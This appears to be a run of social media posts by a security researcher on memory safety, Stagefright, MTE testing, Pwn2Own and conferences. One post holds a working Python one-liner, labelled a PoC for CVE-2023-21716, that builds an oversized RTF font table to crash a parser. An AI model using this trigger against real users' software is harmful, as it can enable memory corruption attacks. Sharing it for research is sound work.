Is your vendor committed to memory safe software? Maybe you should ask them. FWIW younger companies seem to be making the right decision up front.
@NetRiseInc
@runZeroInc
@spr_networks
are a few examples.
CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
@davepl1968
I still would love to know more about why it tells you there's an unspecified security risk when you browse into one. I have my thoughts, but you would be the expert.
Most people think my Stagefright work was all positive. Underneath the surface, I lost a lot of good friends and caused a lot of resentment. I found that dealing with the press was draining and ultimately I withdrew from the industry for years after. Hindsight is enlightening.
I couldn't agree more with
@daveaitel
recent mailing list post. A random URL I visit should not have the same access to browser functionality as something I visit every day.
If you've never seen "The Net" starring Sandra Bullock, you're over due. Starting to wonder if these security product companies watched it and got crazy ideas.
I've been evaluating MTE on Pixel 8 Pro. I guess it's sort of my own private CTF. If someone at Google/Android would like to sponsor the work, that would be awesome. If not, oh well. Either way, coming soon-ish...
Take away from automotive
@Pwn2Own_Contest
? Whoever develops these products have nearly zero understanding of security/common attacks. Also, who certified all this stuff??? What are they even doing?
I missed BH/DC this year for the first time in 13 years. Didn't really miss Vegas, but I definitely missed some of you fine people. Hope you had fun and stayed safe.
For some unknown reason, I just woke up in the middle of the night thinking the HP CEO should face criminal charges for bricking printers. If I bricked a bunch of printers, I would expect to face charges. But hey, I don't even like printers.
Another great memory from this year's
@defcon
... Explaining reverse engineering to
@mc_frontalot
at the 562 party. "When you can reverse engineer, everything is open source."